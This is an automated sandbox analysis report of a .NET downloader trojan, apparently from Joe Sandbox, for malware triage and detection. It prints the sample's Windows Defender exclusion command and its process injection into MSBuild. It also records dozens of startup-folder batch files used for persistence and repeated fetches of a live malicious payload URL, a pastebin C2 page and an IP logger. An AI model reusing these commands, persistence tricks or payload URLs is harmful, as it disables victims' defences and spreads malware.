Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Analysis ID:	1512141
MD5:	ec3afdbd761916a682e9372834365939
SHA1:	35e3b8bc572d9ceadb2d519c4013fcf3632da802
SHA256:	6e4422d8d101bf53165220c1fce47839b23a41057420d070fb909979415553f8
Tags:	exe
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Connects to a pastebin service (likely for C&C)

Creates HTML files with .exe extension (expired dropper behavior)

Disables UAC (registry)

Drops script or batch files to the startup folder

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Silenttrinity Stager Msbuild Activity

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe (PID: 3224 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe" MD5: EC3AFDBD761916A682E9372834365939)

conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2852 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7692 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

AddInProcess32.exe (PID: 5552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

jsc.exe (PID: 4864 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)

MSBuild.exe (PID: 1340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

svchost.exe (PID: 5700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cmd.exe (PID: 3392 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATW4YMuey528R5HSnE54AwE5.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5164 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3KsdkaRiL7RacJah2YobpSxj.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u0RvkxN9wEthGCCLh4tn7zqU.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3184 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4KsgxmPNACDuZ2zjqQjtltvX.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4016 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3njSfWDGOVl28Hs8hyJ6Y7LT.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9O41Qow2bZeAiNaUuBCU9sI8.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FLz6tWFKVQbppt2Sn3SWxNu4.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2884 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8NYZUwJycflpNiJIlSTOBho.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5044 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aPLL8m8adxhtzUUH2fMBYP78.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdci9HHJSUc0QT0L7qkU4ePj.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4996 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nGizfduNOl4JVOkYHOr4NIAN.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6724 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NtFoY6Vi2WtE4qAcwOzUXMHK.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5028 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C8TVyoaND4r7GWzWKeeVLeMP.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1864 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fKQUct9QxCcX5qlUcu38pRMl.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6440 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBNY7HBfHixtkjGDaljf7VCr.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jl2Nqcc7XWeOOYztXFcYbkmD.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7116 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OK2XFEh3D7xuLDF5l083mPKW.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6252 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p04DXHk7aV49bHDBuFA6B2XV.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Unpacked PEs

Source	Rule	Description	Author
7.2.MSBuild.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ecfc040.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ea11f30.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ea1add8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ParentProcessId: 3224, ParentProcessName: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 2852, ProcessName: powershell.exe

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.20.4.235, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1340, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ParentProcessId: 3224, ParentProcessName: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 2852, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5700, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 1340, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://yip.su/RNWPd.exe	Avira URL Cloud: Label: malware
Source: https://pastebin.com/raw/V6VJsrV3	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49796 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\

Networking

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: Zu7wa3hTioo41CyobTIbG45C.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ecfc040.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ea11f30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe.19c1ea1add8.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
